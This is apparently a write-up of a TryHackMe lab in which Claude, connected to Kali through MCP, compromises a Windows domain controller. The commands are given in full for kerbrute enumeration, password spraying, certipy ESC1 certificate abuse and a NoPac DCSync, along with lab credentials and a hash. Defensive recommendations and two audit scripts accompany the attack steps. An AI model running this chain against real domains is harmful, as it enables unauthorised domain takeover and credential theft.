AI-Assisted Penetration Testing: A TryHackMe Lab Walkthrough with Claude
Disclaimer: This walkthrough was performed entirely within a TryHackMe lab environment.
Introduction
This post documents the successful attack paths, the tools used, and the findings from the engagement, as an example of the future of CTF-type events.
Lab Setup
- Kali Linux at 192.168.50.152 running an MCP server, giving Claude direct tool access
- Target: 10.65.181.232 — Windows Server 2019 Domain Controller, domain lunar.eruca.com, hostname LUNDC, accessed via OpenVPN tunnel on tun0
Claude had access to the following Kali tools via the MCP connection:
- execute_command — arbitrary shell execution
- nmap_scan — network/port scanning
- nxc (NetExec) — SMB/LDAP/WinRM enumeration and exploitation
- impacket suite — secretsdump, GetNPUsers, findDelegation
- certipy — ADCS enumeration and exploitation
- kerbrute — Kerberos username enumeration
- ldapdomaindump — LDAP enumeration
The Engagement: lunar.eruca.com
Connecting via VPN
The target required routing through an OpenVPN tunnel on tun0. Claude identified the missing route and added it directly:
ip route add 10.65.181.0/24 via 10.13.0.1 dev tun0
With connectivity established, Nmap confirmed open ports:
88/tcp open kerberos-sec
389/tcp open ldap
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Hostname: LUNDC | Domain: lunar.eruca.com
Username Enumeration with Kerbrute
With no null sessions and no AS-REP vulnerable accounts, Claude pivoted to Kerbrute — using Kerberos AS-REQ pre-authentication probes to enumerate valid usernames without any credentials:
/opt/kerbrute/kerbrute_linux_amd64 userenum --dc 10.65.181.232 \
-d lunar.eruca.com /usr/share/seclists/.../names.txt -t 50
Valid users discovered:
alane, bowen, cali, callen, elane, kali, mali, ryoung, administrator, thm
Password Spray — Getting a Foothold
Claude sprayed the valid user list with candidate passwords, landing a hit on thm:
[+] lunar.eruca.com\thm:Password1@
Checking thm’s access revealed Domain Admin-level privileges with C$ READ/WRITE — full filesystem access to the DC.
ADCS Enumeration — ESC1
Claude used NetExec’s ADCS module to identify the Certificate Authority:
Found PKI Enrollment Server: LUNDC.lunar.eruca.com
Found CN: lunar-LUNDC-CA
Then Certipy revealed two ESC1-vulnerable templates:
certipy find -u thm@lunar.eruca.com -p 'Password1@' \
-dc-ip 10.65.181.232 -stdout -vulnerable
Both HTTPSWebServer and UserRequest templates allowed any authenticated user to supply an arbitrary Subject Alternative Name (SAN) with no manager approval required — a textbook ESC1 misconfiguration.
Exploiting ESC1 — Certificate-Based Admin Impersonation
Step 1: Request a certificate for administrator@lunar.eruca.com as the low-privilege thm user:
certipy req -u thm@lunar.eruca.com -p 'Password1@' \
-ca lunar-LUNDC-CA -dc-ip 10.65.181.232 \
-template UserRequest -upn administrator@lunar.eruca.com \
-out /tmp/admin_cert -dcom
[*] Got certificate with UPN 'administrator@lunar.eruca.com'
[*] Saving certificate and private key to 'admin_cert.pfx'
Step 2: Authenticate with the certificate to retrieve the administrator’s NT hash:
certipy auth -pfx 'admin_cert.pfx' -dc-ip 10.65.181.232 \
-domain lunar.eruca.com -username administrator
[*] Got TGT
[*] Got hash for 'administrator@lunar.eruca.com':
aad3b435b51404eeaad3b435b51404ee:400da5ca40476e5aa7d2dbf542c6e5c3
From a standard domain user to a Domain Admin certificate and NT hash — no elevated privileges required at any point.
Misconfiguration Audit
Claude ran a comprehensive misconfiguration sweep using NetExec modules, impacket, and manual checks. The results were striking:
| Misconfiguration | Severity | Impact |
|---|---|---|
| ESC1 — ADCS vulnerable templates (x2) | 🔴 Critical | Any auth user → DA via certificate |
| ZeroLogon (CVE-2020-1472) | 🔴 Critical | Unauthenticated → DA |
| NoPac (CVE-2021-42278/42287) | 🔴 Critical | Domain user → DA via sAMAccountName spoofing |
| Unconstrained Delegation on DC | 🔴 Critical | Coerce + capture admin TGT |
| 5× Coercion vectors (PetitPotam, PrinterBug, DFSCoerce, MSEven) | 🟠 High | Force DC auth → relay/capture |
| Print Spooler running on DC | 🟠 High | PrinterBug / PrintNightmare enabler |
| MachineAccountQuota = 10 | 🟠 High | Enables NoPac and RBCD attacks |
| No account lockout policy | 🟡 Medium | Unlimited password spraying |
| Service accounts with DA rights (svc.gitlab) | 🟡 Medium | Lateral movement pivot |
| No Fine-Grained Password Policies | 🟡 Medium | Weak passwords on privileged accounts |
NoPac — sAMAccountName Spoofing to Domain Admin
With NoPac confirmed vulnerable, Claude ran the exploit using the thm credentials:
python3 /opt/noPac/noPac.py lunar.eruca.com/thm:'Password1@' \
-dc-ip 10.65.181.232 -dc-host LUNDC \
--impersonate administrator -dump -just-dc-ntlm
NoPac works by:
- Creating a machine account (MAQ = 10 allows this)
- Renaming it to match the DC’s sAMAccountName (LUNDC)
- Requesting a TGT before the DC appends $ to the name
- Using CVE-2021-42287 to obtain a service ticket as administrator
- Running DCSync to dump all hashes
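A defender's counterpart to the NoPac steps above, as an added example (not the lab's or noPac.py's code): it checks the precondition the chain starts with (MachineAccountQuota) and the directory artefacts the rename and spoof steps leave behind. The attribute names are the real AD ones; the computer objects and the creator SID are constructed, not read from the lunar.eruca.com directory.

```python
# Added example (not the lab's or noPac.py's code): audit a domain for NoPac preconditions
# and artefacts. Attribute names are the real AD ones; the records below are constructed
# rather than read from the lunar.eruca.com directory.


def nopac_findings(machine_account_quota, computers, dc_names):
    """Return findings as strings; an empty list means no preconditions or artefacts found."""
    findings = []
    dcs = {n.upper().rstrip("$") for n in dc_names}
    # Precondition: MAQ > 0 lets any domain user create the machine account the chain starts with.
    if machine_account_quota > 0:
        findings.append(f"ms-DS-MachineAccountQuota is {machine_account_quota}; set it to 0")
    for c in computers:
        sam = c["sAMAccountName"]
        in_dc_ou = "OU=Domain Controllers" in c["distinguishedName"]
        # Artefact of the rename step: a computer object whose name lost its trailing '$'.
        if not sam.endswith("$"):
            findings.append(f"{sam}: computer sAMAccountName lacks trailing '$'")
        # Artefact of the spoof: a non-DC object whose name shadows a real DC (LUNDC in the lab).
        if sam.rstrip("$").upper() in dcs and not in_dc_ou:
            findings.append(f"{sam}: name collides with a domain controller outside the DC OU")
        # Quota use: mS-DS-CreatorSID is only populated when a non-admin created the object.
        if c.get("mS-DS-CreatorSID"):
            findings.append(f"{sam}: created via MachineAccountQuota by {c['mS-DS-CreatorSID']}")
    return findings


# Constructed sample: the real LUNDC$ object, a quota-created machine renamed to LUNDC,
# and a legitimate workstation. The creator SID is a placeholder, not a value from the lab.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "LUNDC$",
     "distinguishedName": "CN=LUNDC,OU=Domain Controllers,DC=lunar,DC=eruca,DC=com"},
    {"sAMAccountName": "LUNDC",
     "distinguishedName": "CN=DESKTOP-X1,CN=Computers,DC=lunar,DC=eruca,DC=com",
     "mS-DS-CreatorSID": "S-1-5-21-0-0-0-1105"},
    {"sAMAccountName": "WKSTN01$",
     "distinguishedName": "CN=WKSTN01,CN=Computers,DC=lunar,DC=eruca,DC=com"},
]
```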
Key Takeaways
Attack Chain Summary
Kerbrute enum → Password spray → ESC1 cert request → Admin NT hash + TGT → NoPac DCSync
What Made Claude Invaluable
- Contextual awareness — Claude didn’t just run tools blindly. When Nmap showed ports 88, 389, and 445, it immediately identified the target as a DC and adjusted the attack strategy accordingly.
- Adaptive troubleshooting — When RPC enrollment failed for Certipy, Claude diagnosed the issue, tried DCOM, and succeeded. When clock skew broke Kerberos auth, Claude fixed it on the fly.
- Proactive enumeration — Claude suggested AS-REP roasting, Kerberoasting, delegation checks, and the full misconfiguration audit without being asked — bringing real penetration testing methodology rather than just executing commands.
- Attack chaining — Claude naturally connected findings into full attack chains, e.g. recognising that ESC1 + authenticated user = DA without needing explicit instruction.
- Speed — What might take hours of manual work — recon, spray, enumeration, ADCS analysis, exploitation — was accomplished in a single focused session.
Defensive Recommendations
For anyone running AD environments, the findings here map to clear remediations:
- ADCS: Audit all certificate templates. Disable EnrolleeSuppliesSubject unless strictly required. Enable manager approval on sensitive templates.
- NoPac: Apply KB5008380 / KB5008102. Set MachineAccountQuota to 0 for non-admin users.
- ZeroLogon: Apply the August 2020 security update (KB4557222) and enforce secure channel.
- Delegation: Remove unconstrained delegation from all accounts. Use constrained or resource-based constrained delegation only.
- Coercion: Disable Print Spooler on DCs. Apply patches for PetitPotam and DFSCoerce vectors.
- Password policy: Enforce minimum length (14+ chars), complexity, history, and account lockout (5–10 attempts).
- Service accounts: Remove DA rights from service accounts. Use Group Managed Service Accounts (gMSA).
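The template audit that both the ESC1 finding (two templates letting any authenticated user supply a SAN with no manager approval) and the ADCS remediation bullet above call for, as an added example that is not the lab's or Certipy's code. It evaluates the five ESC1 conditions offline over constructed template records; the attribute names are the real ones on objects in the Certificate Templates container, while "enroll_principals" is an assumed simplification standing in for parsing each template's security descriptor.

```python
# Added example (not the lab's or Certipy's code): flag templates meeting every ESC1 condition.
# Attribute names are the real ones on objects under CN=Certificate Templates,CN=Public Key
# Services,CN=Services,CN=Configuration,...; "enroll_principals" is a simplification standing in
# for parsing each template's nTSecurityDescriptor for Enroll rights.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag: requester picks the SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: requests wait for manager approval
# EKUs that permit Kerberos PKINIT logon (Client Auth, Smart Card Logon, PKINIT Client Auth)
# plus Any Purpose; an empty EKU list also qualifies.
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2", "1.3.6.1.5.2.3.4", "2.5.29.37.0"}
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def esc1_reasons(t):
    """Return the ESC1 conditions a template satisfies; all five together make it ESC1."""
    reasons = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("EnrolleeSuppliesSubject set")
    if not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval")
    if t.get("msPKI-RA-Signature", 0) == 0:
        reasons.append("no authorized signature required")
    eku = set(t.get("pKIExtendedKeyUsage", []))
    if not eku or eku & AUTH_EKUS:
        reasons.append("EKU allows client authentication")
    if LOW_PRIV_PRINCIPALS & set(t["enroll_principals"]):
        reasons.append("low-privilege principals hold Enroll")
    return reasons


def is_esc1(t):
    return len(esc1_reasons(t)) == 5


def audit(templates):
    """Map each fully-ESC1 template name to the conditions it meets."""
    return {t["cn"]: esc1_reasons(t) for t in templates if is_esc1(t)}

# Constructed records: the two templates the lab flagged, the default User template as a
# safe control, and UserRequest after the "enable manager approval" remediation.
VULN = {"msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll_principals": ["Authenticated Users"]}
SAMPLE_TEMPLATES = [
    {**VULN, "cn": "UserRequest"},
    {**VULN, "cn": "HTTPSWebServer", "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"]},
    {"cn": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_principals": ["Domain Users"]},
    {**VULN, "cn": "UserRequest-fixed", "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS},
]
```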
Conclusion
This session demonstrated that Claude, connected to a Kali Linux machine via MCP, is a genuinely capable penetration testing assistant. It doesn’t just execute commands — it thinks through the engagement, adapts to failures, chains findings into attack paths, and explains the methodology along the way.
For security professionals and students working through AD labs, this kind of AI-assisted workflow dramatically accelerates learning and execution. Every command was reasoned, every finding was contextualised, and every next step was suggested proactively.
The future of penetration testing tooling isn’t just better scripts — it’s better thinking. And that’s exactly what Claude brings to the table.